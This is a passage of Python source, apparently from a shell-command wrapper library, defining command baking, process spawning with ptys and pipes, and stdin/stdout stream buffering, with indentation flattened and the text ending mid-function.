rc_exc_regex = re.compile(r"ErrorReturnCode_(\d+)")
rc_exc_cache = {}
def get_rc_exc(rc):
rc = int(rc)
try: return rc_exc_cache[rc]
except KeyError: pass
name = "ErrorReturnCode_%d" % rc
exc = type(name, (ErrorReturnCode,), {})
rc_exc_cache[rc] = exc
return exc
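# Illustrative sketch (not part of the original module): get_rc_exc() builds and
# caches one ErrorReturnCode subclass per exit code, so a caller can catch a
# specific code by name.
def _example_rc_exc():
    exc_1 = get_rc_exc(1)
    assert issubclass(exc_1, ErrorReturnCode)
    assert get_rc_exc(1) is exc_1  # cached on the second lookup
    return exc_1.__name__          # "ErrorReturnCode_1"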
def which(program):
def is_exe(fpath):
return os.path.exists(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program): return program
else:
if "PATH" not in os.environ: return None
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
def resolve_program(program):
path = which(program)
if not path:
# our actual command might have a dash in it, but we can't call
# that from python (we have to use underscores), so we'll check
# if a dash version of our underscore command exists and use that
# if it does
if "_" in program: path = which(program.replace("_", "-"))
if not path: return None
return path
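# Illustrative sketch (not part of the original module): since Python identifiers
# cannot contain dashes, resolve_program() falls back to the dashed spelling of
# an underscored name. "apt_get" is only an example; the result depends on what
# is installed on PATH (None if neither spelling is found).
def _example_resolve_program():
    return resolve_program("apt_get")  # tries "apt_get", then "apt-get"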
# we add this thin wrapper to glob.glob because of a specific edge case where
# glob does not expand to anything. for example, if you try to do
# glob.glob("*.py") and there are no *.py files in the directory, glob.glob
# returns an empty list. this empty list gets passed to the command, and
# then the command fails with a misleading error message. this thin wrapper
# ensures that if there is no expansion, we pass in the original argument,
# so that when the command fails, the error message is clearer
def glob(arg):
return original_glob(arg) or arg
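# Illustrative sketch (not part of the original module): when the pattern
# matches nothing, the wrapper hands the literal pattern back instead of an
# empty list, so a failing command still shows what it was asked for.
def _example_glob_fallback():
    return glob("*.does_not_exist_anywhere")  # -> "*.does_not_exist_anywhere"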
class RunningCommand(object):
def __init__(self, cmd, call_args, stdin, stdout, stderr):
self.log = logging.getLogger("command %r call_args %r" % (cmd, call_args))
self.call_args = call_args
self.cmd = cmd
self.ran = " ".join(cmd)
self.process = None
self.should_wait = True
spawn_process = True
# with contexts shouldn't run at all yet, they prepend
# to every command in the context
if call_args["with"]:
spawn_process = False
Command._prepend_stack.append(self)
if callable(call_args["out"]) or callable(call_args["err"]):
self.should_wait = False
if call_args["piped"] or call_args["iter"] or call_args["iter_noblock"]:
self.should_wait = False
# we're running in the background, return self and let us lazily
# evaluate
if call_args["bg"]: self.should_wait = False
# redirection
if call_args["err_to_out"]: stderr = STDOUT
# set up which stream should write to the pipe
# TODO, make pipe None by default and limit the size of the Queue
# in oproc.OProc
pipe = STDOUT
if call_args["iter"] == "out" or call_args["iter"] is True: pipe = STDOUT
elif call_args["iter"] == "err": pipe = STDERR
if call_args["iter_noblock"] == "out" or call_args["iter_noblock"] is True: pipe = STDOUT
elif call_args["iter_noblock"] == "err": pipe = STDERR
if spawn_process:
if logging_enabled: self.log.debug("starting process")
self.process = OProc(cmd, stdin, stdout, stderr,
self.call_args, pipe=pipe)
if self.should_wait:
self.wait()
def wait(self):
self._handle_exit_code(self.process.wait())
return self
# here we determine if we had an exception, or an error code that we weren't
# expecting to see. if we did, we create and raise an exception
def _handle_exit_code(self, code):
if code not in self.call_args["ok_code"] and code >= 0: raise get_rc_exc(code)(
" ".join(self.cmd),
self.process.stdout,
self.process.stderr
)
@property
def stdout(self):
self.wait()
return self.process.stdout
@property
def stderr(self):
self.wait()
return self.process.stderr
@property
def exit_code(self):
self.wait()
return self.process.exit_code
@property
def pid(self):
return self.process.pid
def __len__(self):
return len(str(self))
def __enter__(self):
# we don't actually do anything here because anything that should
# have been done would have been done in the Command.__call__ call.
        # essentially all that has to happen is that the command be pushed onto
# the prepend stack.
pass
def __iter__(self):
return self
def next(self):
# we do this because if get blocks, we can't catch a KeyboardInterrupt
# so the slight timeout allows for that.
while True:
try: chunk = self.process._pipe_queue.get(False, .001)
except Empty:
if self.call_args["iter_noblock"]: return errno.EWOULDBLOCK
else:
if chunk is None:
self.wait()
raise StopIteration()
try: return chunk.decode(self.call_args["encoding"])
except UnicodeDecodeError: return chunk
# python 3
__next__ = next
def __exit__(self, typ, value, traceback):
if self.call_args["with"] and Command._prepend_stack:
Command._prepend_stack.pop()
def __str__(self):
if IS_PY3: return self.__unicode__()
else: return unicode(self).encode(self.call_args["encoding"])
def __unicode__(self):
if self.process:
if self.stdout: return self.stdout.decode(self.call_args["encoding"])
return ""
def __eq__(self, other):
return unicode(self) == unicode(other)
def __contains__(self, item):
return item in str(self)
def __getattr__(self, p):
# let these three attributes pass through to the OProc object
if p in ("signal", "terminate", "kill"):
if self.process: return getattr(self.process, p)
else: raise AttributeError
return getattr(unicode(self), p)
def __repr__(self):
try: return str(self)
except UnicodeDecodeError:
if self.process:
if self.stdout: return repr(self.stdout)
return repr("")
def __long__(self):
return long(str(self).strip())
def __float__(self):
return float(str(self).strip())
def __int__(self):
return int(str(self).strip())
class Command(object):
_prepend_stack = []
_call_args = {
# currently unsupported
#"fg": False, # run command in foreground
"bg": False, # run command in background
"with": False, # prepend the command to every command after it
"in": None,
"out": None, # redirect STDOUT
"err": None, # redirect STDERR
"err_to_out": None, # redirect STDERR to STDOUT
# stdin buffer size
# 1 for line, 0 for unbuffered, any other number for that amount
"in_bufsize": 0,
# stdout buffer size, same values as above
"out_bufsize": 1,
"err_bufsize": 1,
# this is how big the output buffers will be for stdout and stderr.
# this is essentially how much output they will store from the process.
# we use a deque, so if it overflows past this amount, the first items
# get pushed off as each new item gets added.
#
# NOTICE
# this is not a *BYTE* size, this is a *CHUNK* size...meaning, that if
# you're buffering out/err at 1024 bytes, the internal buffer size will
# be "internal_bufsize" CHUNKS of 1024 bytes
"internal_bufsize": 3 * 1024**2,
"env": None,
"piped": None,
"iter": None,
"iter_noblock": None,
"ok_code": 0,
"cwd": None,
# this is for programs that expect their input to be from a terminal.
# ssh is one of those programs
"tty_in": False,
"tty_out": True,
"encoding": "utf8",
# how long the process should run before it is auto-killed
"timeout": 0,
}
# these are arguments that cannot be called together, because they wouldn't
# make any sense
_incompatible_call_args = (
#("fg", "bg", "Command can't be run in the foreground and background"),
("err", "err_to_out", "Stderr is already being redirected"),
("piped", "iter", "You cannot iterate when this command is being piped"),
)
@classmethod
def _create(cls, program):
path = resolve_program(program)
if not path: raise CommandNotFound(program)
return cls(path)
def __init__(self, path):
self._path = path
self._partial = False
self._partial_baked_args = []
self._partial_call_args = {}
def __getattribute__(self, name):
# convenience
getattr = partial(object.__getattribute__, self)
if name.startswith("_"): return getattr(name)
if name == "bake": return getattr("bake")
return getattr("bake")(name)
@staticmethod
def _extract_call_args(kwargs, to_override={}):
kwargs = kwargs.copy()
call_args = {}
for parg, default in Command._call_args.items():
key = "_" + parg
if key in kwargs:
call_args[parg] = kwargs[key]
del kwargs[key]
elif parg in to_override:
call_args[parg] = to_override[parg]
# test for incompatible call args
s1 = set(call_args.keys())
for args in Command._incompatible_call_args:
args = list(args)
error = args.pop()
if s1.issuperset(args):
raise TypeError("Invalid special arguments %r: %s" % (args, error))
return call_args, kwargs
def _format_arg(self, arg):
if IS_PY3: arg = str(arg)
else: arg = unicode(arg).encode("utf8")
return arg
def _compile_args(self, args, kwargs):
processed_args = []
# aggregate positional args
for arg in args:
if isinstance(arg, (list, tuple)):
if not arg:
warnings.warn("Empty list passed as an argument to %r. \
If you're using glob.glob(), please use sh.glob() instead." % self.path, stacklevel=3)
for sub_arg in arg: processed_args.append(self._format_arg(sub_arg))
else: processed_args.append(self._format_arg(arg))
# aggregate the keyword arguments
for k,v in kwargs.items():
# we're passing a short arg as a kwarg, example:
# cut(d="\t")
if len(k) == 1:
processed_args.append("-"+k)
if v is not True: processed_args.append(self._format_arg(v))
# we're doing a long arg
else:
k = k.replace("_", "-")
if v is True: processed_args.append("--"+k)
else: processed_args.append("--%s=%s" % (k, self._format_arg(v)))
return processed_args
def bake(self, *args, **kwargs):
fn = Command(self._path)
fn._partial = True
call_args, kwargs = self._extract_call_args(kwargs)
pruned_call_args = call_args
for k,v in Command._call_args.items():
try:
if pruned_call_args[k] == v:
del pruned_call_args[k]
except KeyError: continue
fn._partial_call_args.update(self._partial_call_args)
fn._partial_call_args.update(pruned_call_args)
fn._partial_baked_args.extend(self._partial_baked_args)
fn._partial_baked_args.extend(self._compile_args(args, kwargs))
return fn
def __str__(self):
if IS_PY3: return self.__unicode__()
else: return unicode(self).encode("utf8")
def __eq__(self, other):
try: return str(self) == str(other)
except: return False
def __repr__(self):
return str(self)
def __unicode__(self):
baked_args = " ".join(self._partial_baked_args)
if baked_args: baked_args = " " + baked_args
return self._path + baked_args
def __enter__(self):
self(_with=True)
def __exit__(self, typ, value, traceback):
Command._prepend_stack.pop()
def __call__(self, *args, **kwargs):
kwargs = kwargs.copy()
args = list(args)
cmd = []
# aggregate any 'with' contexts
call_args = Command._call_args.copy()
for prepend in self._prepend_stack:
# don't pass the 'with' call arg
pcall_args = prepend.call_args.copy()
try: del pcall_args["with"]
except: pass
call_args.update(pcall_args)
cmd.extend(prepend.cmd)
cmd.append(self._path)
# here we extract the special kwargs and override any
# special kwargs from the possibly baked command
tmp_call_args, kwargs = self._extract_call_args(kwargs, self._partial_call_args)
call_args.update(tmp_call_args)
if not isinstance(call_args["ok_code"], (tuple, list)):
call_args["ok_code"] = [call_args["ok_code"]]
# check if we're piping via composition
stdin = call_args["in"]
if args:
first_arg = args.pop(0)
if isinstance(first_arg, RunningCommand):
# it makes sense that if the input pipe of a command is running
# in the background, then this command should run in the
# background as well
if first_arg.call_args["bg"]: call_args["bg"] = True
stdin = first_arg.process._pipe_queue
else:
args.insert(0, first_arg)
processed_args = self._compile_args(args, kwargs)
# makes sure our arguments are broken up correctly
split_args = self._partial_baked_args + processed_args
final_args = split_args
cmd.extend(final_args)
# stdout redirection
stdout = call_args["out"]
if stdout \
and not callable(stdout) \
and not hasattr(stdout, "write") \
and not isinstance(stdout, (cStringIO, StringIO)):
stdout = open(str(stdout), "wb")
# stderr redirection
stderr = call_args["err"]
if stderr and not callable(stderr) and not hasattr(stderr, "write") \
and not isinstance(stderr, (cStringIO, StringIO)):
stderr = open(str(stderr), "wb")
return RunningCommand(cmd, call_args, stdin, stdout, stderr)
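# Illustrative sketch (not part of the original module): how baking and the
# keyword-to-flag translation are meant to be used. "ls" is only an example
# program; whether it exists (and accepts these flags) depends on the host.
def _example_command_baking():
    ls = Command._create("ls")   # resolve "ls" on PATH
    ls_l = ls.bake("-l")         # pre-bake the "-l" flag
    # keyword arguments become flags: reverse=True -> "--reverse", t=True -> "-t"
    listing = ls_l("/tmp", reverse=True)
    return str(listing)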
# used in redirecting
STDOUT = -1
STDERR = -2
# Process open = Popen
# Open Process = OProc
class OProc(object):
_procs_to_cleanup = []
_registered_cleanup = False
_default_window_size = (24, 80)
def __init__(self, cmd, stdin, stdout, stderr, call_args,
persist=False, pipe=STDOUT):
self.call_args = call_args
self._single_tty = self.call_args["tty_in"] and self.call_args["tty_out"]
# this logic is a little convoluted, but basically this top-level
# if/else is for consolidating input and output TTYs into a single
# TTY. this is the only way some secure programs like ssh will
        # output correctly (that is, if stdout and stdin are both the same TTY)
if self._single_tty:
self._stdin_fd, self._slave_stdin_fd = pty.openpty()
self._stdout_fd = self._stdin_fd
self._slave_stdout_fd = self._slave_stdin_fd
self._stderr_fd = self._stdin_fd
self._slave_stderr_fd = self._slave_stdin_fd
# do not consolidate stdin and stdout
else:
if self.call_args["tty_in"]:
self._slave_stdin_fd, self._stdin_fd = pty.openpty()
else:
self._slave_stdin_fd, self._stdin_fd = os.pipe()
# tty_out is usually the default
if self.call_args["tty_out"]:
self._stdout_fd, self._slave_stdout_fd = pty.openpty()
else:
self._stdout_fd, self._slave_stdout_fd = os.pipe()
# unless STDERR is going to STDOUT, it ALWAYS needs to be a pipe,
# and never a PTY. the reason for this is not totally clear to me,
# but it has to do with the fact that if STDERR isn't set as the
# CTTY (because STDOUT is), the STDERR buffer won't always flush
# by the time the process exits, and the data will be lost.
# i've only seen this on OSX.
if stderr is not STDOUT:
self._stderr_fd, self._slave_stderr_fd = os.pipe()
self.pid = os.fork()
# child
if self.pid == 0:
# this piece of ugliness is due to a bug where we can lose output
# if we do os.close(self._slave_stdout_fd) in the parent after
# the child starts writing.
# see http://bugs.python.org/issue15898
if IS_OSX and IS_PY3: _time.sleep(0.01)
os.setsid()
if self.call_args["tty_out"]:
# set raw mode, so there isn't any weird translation of newlines
# to \r\n and other oddities. we're not outputting to a terminal
# anyways
#
# we HAVE to do this here, and not in the parent thread, because
# we have to guarantee that this is set before the child process
# is run, and we can't do it twice.
tty.setraw(self._stdout_fd)
os.close(self._stdin_fd)
if not self._single_tty:
os.close(self._stdout_fd)
if stderr is not STDOUT: os.close(self._stderr_fd)
if self.call_args["cwd"]: os.chdir(self.call_args["cwd"])
os.dup2(self._slave_stdin_fd, 0)
os.dup2(self._slave_stdout_fd, 1)
# we're not directing stderr to stdout? then set self._slave_stderr_fd to
# fd 2, the common stderr fd
if stderr is STDOUT: os.dup2(self._slave_stdout_fd, 2)
else: os.dup2(self._slave_stderr_fd, 2)
# don't inherit file descriptors
max_fd = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
os.closerange(3, max_fd)
# set our controlling terminal
if self.call_args["tty_out"]:
tmp_fd = os.open(os.ttyname(1), os.O_RDWR)
os.close(tmp_fd)
if self.call_args["tty_out"]:
self.setwinsize(1)
# actually execute the process
if self.call_args["env"] is None: os.execv(cmd[0], cmd)
else: os.execve(cmd[0], cmd, self.call_args["env"])
os._exit(255)
# parent
else:
if not OProc._registered_cleanup:
atexit.register(OProc._cleanup_procs)
OProc._registered_cleanup = True
self.started = _time.time()
self.cmd = cmd
self.exit_code = None
self._done_callbacks = []
self.stdin = stdin or Queue()
self._pipe_queue = Queue()
# this is used to prevent a race condition when we're waiting for
# a process to end, and the OProc's internal threads are also checking
# for the processes's end
self._wait_lock = threading.Lock()
# these are for aggregating the stdout and stderr. we use a deque
# because we don't want to overflow
self._stdout = deque(maxlen=self.call_args["internal_bufsize"])
self._stderr = deque(maxlen=self.call_args["internal_bufsize"])
if self.call_args["tty_in"]: self.setwinsize(self._stdin_fd)
self.log = logging.getLogger("process %r" % self)
os.close(self._slave_stdin_fd)
if not self._single_tty:
os.close(self._slave_stdout_fd)
if stderr is not STDOUT: os.close(self._slave_stderr_fd)
if logging_enabled: self.log.debug("started process")
if not persist: OProc._procs_to_cleanup.append(self)
if self.call_args["tty_in"]:
attr = termios.tcgetattr(self._stdin_fd)
attr[3] &= ~termios.ECHO
termios.tcsetattr(self._stdin_fd, termios.TCSANOW, attr)
# this represents the connection from a Queue object (or whatever
# we're using to feed STDIN) to the process's STDIN fd
self._stdin_stream = StreamWriter("stdin", self, self._stdin_fd,
self.stdin, self.call_args["in_bufsize"])
stdout_pipe = self._pipe_queue if pipe is STDOUT else None
# this represents the connection from a process's STDOUT fd to
# wherever it has to go, sometimes a pipe Queue (that we will use
# to pipe data to other processes), and also an internal deque
# that we use to aggregate all the output
self._stdout_stream = StreamReader("stdout", self, self._stdout_fd, stdout,
self._stdout, self.call_args["out_bufsize"], stdout_pipe)
if stderr is STDOUT or self._single_tty: self._stderr_stream = None
else:
stderr_pipe = self._pipe_queue if pipe is STDERR else None
self._stderr_stream = StreamReader("stderr", self, self._stderr_fd, stderr,
self._stderr, self.call_args["err_bufsize"], stderr_pipe)
# start the main io threads
self._input_thread = self._start_thread(self.input_thread, self._stdin_stream)
self._output_thread = self._start_thread(self.output_thread, self._stdout_stream, self._stderr_stream)
def __repr__(self):
return "<Process %d %r>" % (self.pid, self.cmd)
# also borrowed from pexpect.py
@staticmethod
def setwinsize(fd):
rows, cols = OProc._default_window_size
TIOCSWINSZ = getattr(termios, 'TIOCSWINSZ', -2146929561)
if TIOCSWINSZ == 2148037735: # L is not required in Python >= 2.2.
TIOCSWINSZ = -2146929561 # Same bits, but with sign.
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(fd, TIOCSWINSZ, s)
@staticmethod
def _start_thread(fn, *args):
thrd = threading.Thread(target=fn, args=args)
thrd.daemon = True
thrd.start()
return thrd
def in_bufsize(self, buf):
self._stdin_stream.stream_bufferer.change_buffering(buf)
def out_bufsize(self, buf):
self._stdout_stream.stream_bufferer.change_buffering(buf)
def err_bufsize(self, buf):
if self._stderr_stream:
self._stderr_stream.stream_bufferer.change_buffering(buf)
def input_thread(self, stdin):
done = False
while not done and self.alive:
if logging_enabled: self.log.debug("%r ready for more input", stdin)
done = stdin.write()
stdin.close()
def output_thread(self, stdout, stderr):
readers = []
errors = []
if stdout is not None:
readers.append(stdout)
errors.append(stdout)
if stderr is not None:
readers.append(stderr)
errors.append(stderr)
while readers:
outputs, inputs, err = select.select(readers, [], errors, 0.1)
# stdout and stderr
for stream in outputs:
if logging_enabled: self.log.debug("%r ready to be read from", stream)
done = stream.read()
if done: readers.remove(stream)
for stream in err:
pass
# test if the process has been running too long
if self.call_args["timeout"]:
now = _time.time()
if now - self.started > self.call_args["timeout"]:
if logging_enabled: self.log.debug("we've been running too long")
self.kill()
# this is here because stdout may be the controlling TTY, and
# we can't close it until the process has ended, otherwise the
# child will get SIGHUP. typically, if we've broken out of
# the above loop, and we're here, the process is just about to
# end, so it's probably ok to aggressively poll self.alive
#
# the other option to this would be to do the CTTY close from
# the method that does the actual os.waitpid() call, but the
# problem with that is that the above loop might still be
# running, and closing the fd will cause some operation to
# fail. this is less complex than wrapping all the ops
# in the above loop with out-of-band fd-close exceptions
while self.alive: _time.sleep(0.001)
if stdout: stdout.close()
if stderr: stderr.close()
@property
def stdout(self):
return "".encode(self.call_args["encoding"]).join(self._stdout)
@property
def stderr(self):
return "".encode(self.call_args["encoding"]).join(self._stderr)
def signal(self, sig):
if logging_enabled: self.log.debug("sending signal %d", sig)
try: os.kill(self.pid, sig)
except OSError: pass
def kill(self):
if logging_enabled: self.log.debug("killing")
self.signal(signal.SIGKILL)
def terminate(self):
if logging_enabled: self.log.debug("terminating")
self.signal(signal.SIGTERM)
@staticmethod
def _cleanup_procs():
for proc in OProc._procs_to_cleanup:
proc.kill()
proc.wait()
def _handle_exit_code(self, exit_code):
# if we exited from a signal, let our exit code reflect that
if os.WIFSIGNALED(exit_code): return -os.WTERMSIG(exit_code)
# otherwise just give us a normal exit code
elif os.WIFEXITED(exit_code): return os.WEXITSTATUS(exit_code)
else: raise RuntimeError("Unknown child exit status!")
@property
def alive(self):
if self.exit_code is not None: return False
# what we're doing here essentially is making sure that the main thread
# (or another thread), isn't calling .wait() on the process. because
# .wait() calls os.waitpid(self.pid, 0), we can't do an os.waitpid
# here...because if we did, and the process exited while in this
# thread, the main thread's os.waitpid(self.pid, 0) would raise OSError
# (because the process ended in another thread).
#
# so essentially what we're doing is, using this lock, checking if
# we're calling .wait(), and if we are, let .wait() get the exit code
# and handle the status, otherwise let us do it.
acquired = self._wait_lock.acquire(False)
if not acquired:
if self.exit_code is not None: return False
return True
try:
# WNOHANG is just that...we're calling waitpid without hanging...
# essentially polling the process
pid, exit_code = os.waitpid(self.pid, os.WNOHANG)
if pid == self.pid:
self.exit_code = self._handle_exit_code(exit_code)
return False
# no child process
except OSError: return False
else: return True
finally: self._wait_lock.release()
def wait(self):
if logging_enabled: self.log.debug("acquiring wait lock to wait for completion")
with self._wait_lock:
if logging_enabled: self.log.debug("got wait lock")
if self.exit_code is None:
if logging_enabled: self.log.debug("exit code not set, waiting on pid")
pid, exit_code = os.waitpid(self.pid, 0)
self.exit_code = self._handle_exit_code(exit_code)
else:
if logging_enabled: self.log.debug("exit code already set (%d), no need to wait", self.exit_code)
self._input_thread.join()
self._output_thread.join()
for cb in self._done_callbacks: cb()
return self.exit_code
class DoneReadingStdin(Exception): pass
class NoStdinData(Exception): pass
# this guy is for reading from some input (the stream) and writing to our
# opened process's stdin fd. the stream can be a Queue, a callable, something
# with the "read" method, a string, or an iterable
class StreamWriter(object):
def __init__(self, name, process, stream, stdin, bufsize):
self.name = name
self.process = process
self.stream = stream
self.stdin = stdin
self.log = logging.getLogger(repr(self))
self.stream_bufferer = StreamBufferer(self.process.call_args["encoding"],
bufsize)
# determine buffering for reading from the input we set for stdin
if bufsize == 1: self.bufsize = 1024
elif bufsize == 0: self.bufsize = 1
else: self.bufsize = bufsize
if isinstance(stdin, Queue):
log_msg = "queue"
self.get_chunk = self.get_queue_chunk
elif callable(stdin):
log_msg = "callable"
self.get_chunk = self.get_callable_chunk
# also handles stringio
elif hasattr(stdin, "read"):
log_msg = "file descriptor"
self.get_chunk = self.get_file_chunk
elif isinstance(stdin, basestring):
log_msg = "string"
if bufsize == 1:
# TODO, make the split() be a generator
self.stdin = iter((c+"\n" for c in stdin.split("\n")))
else:
self.stdin = iter(stdin[i:i+self.bufsize] for i in range(0, len(stdin), self.bufsize))
self.get_chunk = self.get_iter_chunk
else:
log_msg = "general iterable"
self.stdin = iter(stdin)
self.get_chunk = self.get_iter_chunk
if logging_enabled: self.log.debug("parsed stdin as a %s", log_msg)
def __repr__(self):
return "<StreamWriter %s for %r>" % (self.name, self.process)
def fileno(self):
return self.stream
def get_queue_chunk(self):
try: chunk = self.stdin.get(True, 0.01)
except Empty: raise NoStdinData
if chunk is None: raise DoneReadingStdin
return chunk
def get_callable_chunk(self):
try: return self.stdin()
except: raise DoneReadingStdin
def get_iter_chunk(self):
try:
if IS_PY3: return self.stdin.__next__()
else: return self.stdin.next()
except StopIteration: raise DoneReadingStdin
def get_file_chunk(self):
if self.stream_bufferer.type == 1: chunk = self.stdin.readline()
else: chunk = self.stdin.read(self.bufsize)
if not chunk: raise DoneReadingStdin
else: return chunk
    # the return value answers the question "are we done writing forever?"
def write(self):
        # get_chunk may sometimes return bytes and sometimes strings,
# because of the nature of the different types of STDIN objects we
# support
try: chunk = self.get_chunk()
except DoneReadingStdin:
if logging_enabled: self.log.debug("done reading")
if self.process.call_args["tty_in"]:
# EOF time
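                # send the terminal's configured EOF character (typically
                # Ctrl-D, 0x04) so the child sees end-of-input on its pty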
try: char = termios.tcgetattr(self.stream)[6][termios.VEOF]
except: char = chr(4).encode()
os.write(self.stream, char)
return True
except NoStdinData:
if logging_enabled: self.log.debug("received no data")
return False
# if we're not bytes, make us bytes
if IS_PY3 and hasattr(chunk, "encode"):
chunk = chunk.encode(self.process.call_args["encoding"])
for chunk in self.stream_bufferer.process(chunk):
if logging_enabled: self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30])
if logging_enabled: self.log.debug("writing chunk to process")
try:
os.write(self.stream, chunk)
except OSError:
if logging_enabled: self.log.debug("OSError writing stdin chunk")
return True
def close(self):
if logging_enabled: self.log.debug("closing, but flushing first")
chunk = self.stream_bufferer.flush()
if logging_enabled: self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
try:
if chunk: os.write(self.stream, chunk)
if not self.process.call_args["tty_in"]:
if logging_enabled: self.log.debug("we used a TTY, so closing the stream")
os.close(self.stream)
except OSError: pass
class StreamReader(object):
def __init__(self, name, process, stream, handler, buffer, bufsize, pipe_queue=None):
self.name = name
self.process = process
self.stream = stream
self.buffer = buffer
self.pipe_queue = pipe_queue
self.log = logging.getLogger(repr(self))
self.stream_bufferer = StreamBufferer(self.process.call_args["encoding"],
bufsize)
# determine buffering
if bufsize == 1: self.bufsize = 1024
elif bufsize == 0: self.bufsize = 1
else: self.bufsize = bufsize
# here we're determining the handler type by doing some basic checks
# on the handler object
self.handler = handler
if callable(handler): self.handler_type = "fn"
elif isinstance(handler, StringIO): self.handler_type = "stringio"
elif isinstance(handler, cStringIO):
self.handler_type = "cstringio"
elif hasattr(handler, "write"): self.handler_type = "fd"
else: self.handler_type = None
self.should_quit = False
# here we choose how to call the callback, depending on how many
# arguments it takes. the reason for this is to make it as easy as
# possible for people to use, without limiting them. a new user will
# assume the callback takes 1 argument (the data). as they get more
# advanced, they may want to terminate the process, or pass some stdin
# back, and will realize that they can pass a callback of more args
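        # e.g. (illustrative callback signatures a user might pass):
        #   def cb(data): ...                  -> called as cb(chunk)
        #   def cb(data, stdin): ...           -> called as cb(chunk, process_stdin)
        #   def cb(data, stdin, process): ...  -> also receives the process itself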
if self.handler_type == "fn":
implied_arg = 0
if inspect.ismethod(handler):
implied_arg = 1
num_args = len(inspect.getargspec(handler).args)
else:
if inspect.isfunction(handler):
num_args = len(inspect.getargspec(handler).args)
# is an object instance with __call__ method
else:
implied_arg = 1
num_args = len(inspect.getargspec(handler.__call__).args)
self.handler_args = ()
if num_args == implied_arg + 2: self.handler_args = (self.process.stdin,)
elif num_args == implied_arg + 3: self.handler_args = (self.process.stdin, self.process)
def fileno(self):
return self.stream
def __repr__(self):
return "<StreamReader %s for %r>" % (self.name, self.process)
def close(self):
chunk = self.stream_bufferer.flush()
if logging_enabled: self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
if chunk: self.write_chunk(chunk)
if self.handler_type == "fd" and hasattr(self.handler, "close"):
self.handler.flush()
if self.pipe_queue: self.pipe_queue.put(None)
try: os.close(self.stream)
except OSError: pass
def write_chunk(self, chunk):
# in PY3, the chunk coming in will be bytes, so keep that in mind
if self.handler_type == "fn" and not self.should_quit:
# try to use the encoding first, if that doesn't work, send
# the bytes
try: to_handler = chunk.decode(self.process.call_args["encoding"])
except UnicodeDecodeError: to_handler = chunk
self.should_quit = self.handler(to_handler, *self.handler_args)
elif self.handler_type == "stringio":
self.handler.write(chunk.decode(self.process.call_args["encoding"]))
elif self.handler_type in ("cstringio", "fd"):
self.handler.write(chunk)
if self.pipe_queue:
if logging_enabled: self.log.debug("putting chunk onto pipe: %r", chunk[:30])
self.pipe_queue.put(chunk)
self.buffer.append(chunk)
def read(self):
# if we're PY3, we're reading bytes, otherwise we're reading
# str
try: chunk = os.read(self.stream, self.bufsize)
except OSError as e:
if logging_enabled: self.log.debug("got errno %d, done reading", e.errno)
return True
if not chunk:
if logging_enabled: self.log.debug("got no chunk, done reading")
return True
if logging_enabled: self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30])
for chunk in self.stream_bufferer.process(chunk):
self.write_chunk(chunk)
# this is used for feeding in chunks of stdout/stderr, and breaking them up into
# chunks that will actually be put into the internal buffers. for example, if
# you have two processes, one being piped to the other, and you want the first
# process to feed lines of data (instead of the chunks however they arrive),
# OProc will use an instance of this class to chop up the data and feed it as
# lines to be sent down the pipe
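# a sketch of the intended line-buffered behavior (illustrative, not a doctest):
#   b = StreamBufferer("utf8", 1)     # buffer_type=1 means line buffered
#   b.process(b"ab")                  # -> []          (no newline yet, held back)
#   b.process(b"c\nde")               # -> [b"abc\n"]  ("de" stays buffered)
#   b.flush()                         # -> b"de"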
class StreamBufferer(object):
def __init__(self, encoding="utf8", buffer_type=1):
# 0 for unbuffered, 1 for line, everything else for that amount
self.type = buffer_type
self.buffer = []
self.n_buffer_count = 0
self.encoding = encoding
# this is for if we change buffering types. if we change from line
        # buffered to unbuffered, it's very possible that our self.buffer list
# has data that was being saved up (while we searched for a newline).
# we need to use that up, so we don't lose it
self._use_up_buffer_first = False
        # the buffering lock is used because we might change the buffering
# types from a different thread. for example, if we have a stdout
# callback, we might use it to change the way stdin buffers. so we
# lock
self._buffering_lock = threading.RLock()
self.log = logging.getLogger("stream_bufferer")
def change_buffering(self, new_type):
# TODO, when we stop supporting 2.6, make this a with context
if logging_enabled: self.log.debug("acquiring buffering lock for changing buffering")
self._buffering_lock.acquire()
if logging_enabled: self.log.debug("got buffering lock for changing buffering")
try:
if new_type == 0: self._use_up_buffer_first = True
self.type = new_type
finally:
self._buffering_lock.release()
if logging_enabled: self.log.debug("released buffering lock for changing buffering")
def process(self, chunk):
# MAKE SURE THAT THE INPUT IS PY3 BYTES
# THE OUTPUT IS ALWAYS PY3 BYTES
# TODO, when we stop supporting 2.6, make this a with context
if logging_enabled: self.log.debug("acquiring buffering lock to process chunk (buffering: %d)", self.type)
self._buffering_lock.acquire()
if logging_enabled: self.log.debug("got buffering lock to process chunk (buffering: %d)", self.type)
try:
# we've encountered binary, permanently switch to N size buffering
# since matching on newline doesn't make sense anymore
if self.type == 1:
try: chunk.decode(self.encoding)
except:
if logging_enabled: self.log.debug("detected binary data, changing buffering")
self.change_buffering(1024)
# unbuffered
if self.type == 0:
if self._use_up_buffer_first:
self._use_up_buffer_first = False
to_write = self.buffer
self.buffer = []
to_write.append(chunk)
return to_write
return [chunk]
# line buffered
elif self.type == 1:
total_to_write = []
chunk = chunk.decode(self.encoding)
while True:
newline = chunk.find("\n")
if newline == -1: break
chunk_to_write = chunk[:newline+1]
if self.buffer:
# this is ugly, but it's designed to take the existing
# bytes buffer, join it together, tack on our latest
# chunk, then convert the whole thing to a string.
# it's necessary, i'm sure. read the whole block to
# see why.
chunk_to_write = "".encode(self.encoding).join(self.buffer) \
+ chunk_to_write.encode(self.encoding)
chunk_to_write = chunk_to_write.decode(self.encoding)
self.buffer = []
self.n_buffer_count = 0
chunk = chunk[newline+1:]
total_to_write.append(chunk_to_write.encode(self.encoding))
if chunk:
self.buffer.append(chunk.encode(self.encoding))
self.n_buffer_count += len(chunk)
return total_to_write
# N size buffered
else:
total_to_write = []
while True:
overage = self.n_buffer_count + len(chunk) - self.type
if overage >= 0:
ret = "".encode(self.encoding).join(self.buffer) + chunk
chunk_to_write = ret[:self.type]
chunk = ret[self.type:]
total_to_write.append(chunk_to_write)
self.buffer = []
self.n_buffer_count = 0
else:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
break
return total_to_write
finally:
